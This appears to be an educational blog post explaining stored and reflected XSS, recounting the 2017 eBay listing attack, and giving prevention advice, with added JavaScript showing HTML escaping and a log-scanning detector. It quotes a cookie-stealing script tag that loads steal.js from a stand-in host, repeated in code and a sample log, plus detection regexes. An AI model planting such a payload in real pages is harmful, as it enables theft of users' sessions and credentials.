A Thorough Examination and Explanation of XSS Attacks!

In this blog post I will discuss XSS attacks: what this type of attack is, how attackers carry it out, a real-world example of people exploiting this vulnerability, and how to prevent an attacker from exploiting it on your site. So, what exactly is a cross-site scripting (XSS) attack? It is an attack that targets the users of a web application rather than manipulating the application itself. A successful cross-site scripting attack fools users of a web application into unknowingly surrendering their private data, and lets the attacker obtain a user’s session cookies in order to impersonate that particular user. There are two XSS attack types. The first is stored XSS, where an attacker puts tainted script directly into a web application, so that it reaches anyone who visits the site. The other is reflected XSS, where tainted script is reflected by the web application into the user’s browser; the tainted script is hidden in a link and executes once the user clicks on it.

A more in-depth look at XSS attacks, with an example of exactly how an attacker would carry one out: for a stored XSS attack the attacker must first study the website to find a weak point where HTML tags can be embedded in some section of the site. Once the attacker does this, the content they embed is stored on the website. An attacker could hide a malicious link in the site such as: Make millions click here <script src=http://nothingfishy.com/steal.js></script>. Every time the page loads, the hidden script executes and can steal the session cookies of anyone who visits the site. From a user’s session cookies an attacker could then gain access to that person’s account. Once the attacker has access to the victim’s account, they could read sensitive information and impersonate the user. All of this would happen from a user simply going to a compromised webpage, without having to click on anything that looked suspicious. In a reflected XSS attack, by contrast, the attacker has to get a malicious link to the website in front of the user and hide the script inside it. This method does not execute automatically when you load the site the way a stored XSS attack does. Instead, a user has to click the link for the attack to execute and for the user’s session cookies to be compromised. So the more damaging attack is the stored XSS attack, because it can collect the session cookies of everyone who visits the webpage, allowing the attacker to access many different accounts, as opposed to having to trick someone into clicking a suspicious-looking link.
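To make the difference concrete, here is an added example (not code from the original post): a small Node.js listing renderer in its vulnerable and hardened forms, applied to the stored payload quoted above. It also demonstrates the character escaping that the prevention section of this post recommends. The listing markup, the function names and the attribute example are assumptions made for this example.

```javascript
// Added example, not code from the original post. Renders an untrusted
// listing description with and without escaping; the markup and function
// names are assumptions made for this example.

// Each character the post lists (& < > " ' /) mapped to its HTML entity.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "/": "&#x2F;",
};

// Escape untrusted text so the browser treats it as data, not markup.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form: untrusted data is concatenated straight into the page, so a
// stored <script> tag in the description becomes live markup for every visitor.
function renderListingUnsafe(description) {
  return `<div class="listing">${description}</div>`;
}

// Hardened form: the same data is escaped first, so the browser displays the
// tag as text instead of fetching and running steal.js.
function renderListingSafe(description) {
  return `<div class="listing">${escapeHtml(description)}</div>`;
}

// Attribute context: the post says untrusted data belongs inside a quoted
// attribute value. Escaping the quote characters keeps a value from closing
// the attribute early.
function renderTitleAttribute(title) {
  return `<img src="item.png" alt="${escapeHtml(title)}">`;
}

// Check a reviewer can run over rendered output: did a live script tag survive?
function containsLiveScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: the stored-XSS payload quoted in the post.
const STORED_PAYLOAD =
  "Make millions click here <script src=http://nothingfishy.com/steal.js></script>";

console.log("unsafe:", renderListingUnsafe(STORED_PAYLOAD));
console.log("safe:  ", renderListingSafe(STORED_PAYLOAD));
console.log("attr:  ", renderTitleAttribute('12" wheel bike'));
```

Run it with `node` and compare the two lines: the unsafe render hands the browser a real `<script>` element, the safe render hands it the same characters as inert text. Note that this encoder is correct for HTML body and quoted-attribute contexts only; data placed inside a URL, a `<script>` block or a CSS value needs the encoder for that context, which the post's six-character list does not cover.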

I investigated recent XSS attacks and found that eBay recently suffered from a malicious stored cross-site scripting attack. These attacks took place in 2017, when hackers targeted the popular website eBay after discovering a weak point in its code. The weak point was in auction descriptions, where the attackers would place the tainted script. The script was placed in the descriptions of fake vehicle listings as well as of real low-value items. Once someone clicked on a product they thought was interesting and was brought to the product page, the page would reload. Afterwards it would dump the user at a fake eBay login form whose URL began with data:text/html:base64. A normal user would not think anything of this and would assume the site had a glitch, but what was actually happening was that the user had just been subjected to a stored XSS attack and was none the wiser. Once the user was on the modified page, it redirected them to this fake login page, where the unsuspecting user would believe it was a real eBay login page and enter their username and password. The user’s information was then transmitted to a script, and the user was redirected again to an actual eBay page, which displayed that the product they were looking for was no longer available. Even if the user was suspicious about what had just occurred, they had already surrendered their information to the attackers exploiting this vulnerability on the eBay website. The attackers on eBay were able to infect thousands of listings and steal many more credentials. On the positive side, eBay was able to fix these specific attacks back in 2017. eBay also went on to make its site more secure, first by limiting JavaScript and then by blocking it altogether, in the hope of making the site secure.

An important question is how to prevent a cross-site scripting attack and how to protect yourself from one. When making code more secure against XSS attacks, it is important to deny all untrusted data into your HTML document and never accept JavaScript code from an untrusted source, as we saw in the eBay example. Another important practice is that when you do put untrusted data directly into the HTML, you should escape or exclude certain characters so that they cannot start a script. The specific characters to look out for are: & < > " ' /. Another important rule is to put untrusted data only into a quoted attribute value such as width or name, because data in an unquoted attribute value can be broken out of with many different characters. Another good practice for securing a website is to use a web application firewall to block suspicious HTTP traffic to your website. A good method for improving your website’s security is to monitor for suspicious data in HTTP GET parameter values and reject such a request immediately, because it may be an XSS attack. An excellent way to protect yourself from an XSS attack is to be a vigilant user: if you are redirected to a login page for no reason, do not just submit your information into the text fields. If you are browsing the web, do not click on suspicious links that look like click bait, as it may be a reflected XSS attack.
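As an added example (again not code from the original post), here is a small monitor for the "suspicious data in a GET parameter" check described above, run over a few constructed web-server log lines. The log format, the function names and the heuristic patterns are assumptions made for the example; the sample lines are constructed and are not real traffic.

```javascript
// Added example, not code from the original post: scan the query string of
// GET requests for values that look like injected markup. Log format,
// function names and patterns are assumptions made for this example.

// Patterns that should not appear in ordinary parameter values. These are
// detection heuristics for alerting, not a complete filter; output escaping
// remains the primary defence.
const SUSPICIOUS_PATTERNS = [
  /<\s*script/i,               // inline or external script tag
  /<\s*\/?\s*[a-z]+[^>]*>/i,   // any other HTML tag
  /javascript\s*:/i,           // javascript: URL scheme
  /\bon[a-z]+\s*=/i,           // inline event-handler attribute
  /data\s*:\s*text\/html/i,    // data: URL carrying a page, as in the eBay case
];

// Parse one combined-format log line into method, path and query parameters.
// Returns null for lines that do not contain a request line.
function parseRequestLine(line) {
  const m = line.match(/"(GET|POST|HEAD)\s+(\S+)\s+HTTP\/[\d.]+"/);
  if (!m) return null;
  const [, method, target] = m;
  const [path, query = ""] = target.split("?", 2);
  const params = new URLSearchParams(query); // decodes %XX and '+' for us
  return { method, path, params };
}

// Return the names of GET parameters whose decoded value matches a pattern.
function flagSuspiciousParams(line) {
  const req = parseRequestLine(line);
  if (!req || req.method !== "GET") return [];
  const flagged = [];
  for (const [name, value] of req.params) {
    if (SUSPICIOUS_PATTERNS.some((re) => re.test(value))) flagged.push(name);
  }
  return flagged;
}

// Run the monitor over a batch of lines and report only the hits.
function scanLog(lines) {
  return lines
    .map((line, i) => ({ line: i + 1, params: flagSuspiciousParams(line) }))
    .filter((r) => r.params.length > 0);
}

// Constructed sample log lines (not real traffic). Line 2 carries the
// URL-encoded form of the script tag quoted earlier in the post.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=used+bike HTTP/1.1" 200 512',
  '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%3Cscript%20src%3Dhttp%3A%2F%2Fnothingfishy.com%2Fsteal.js%3E%3C%2Fscript%3E HTTP/1.1" 200 512',
  '203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /item?id=42&ref=javascript%3Avoid(0) HTTP/1.1" 200 900',
  '203.0.113.9 - - [10/Oct/2023:13:56:10 +0000] "POST /login HTTP/1.1" 302 0',
];

console.log(scanLog(SAMPLE_LOG));
```

The decoding step matters: a filter that inspects the raw query string would miss `%3Cscript`, so the monitor decodes each value the way the application would before matching. Expect some false positives from the event-handler pattern on free-text fields (any value containing a word starting with "on" followed by "="), so treat hits as alerts to review rather than as automatic blocks unless the parameter is one that never legitimately carries markup.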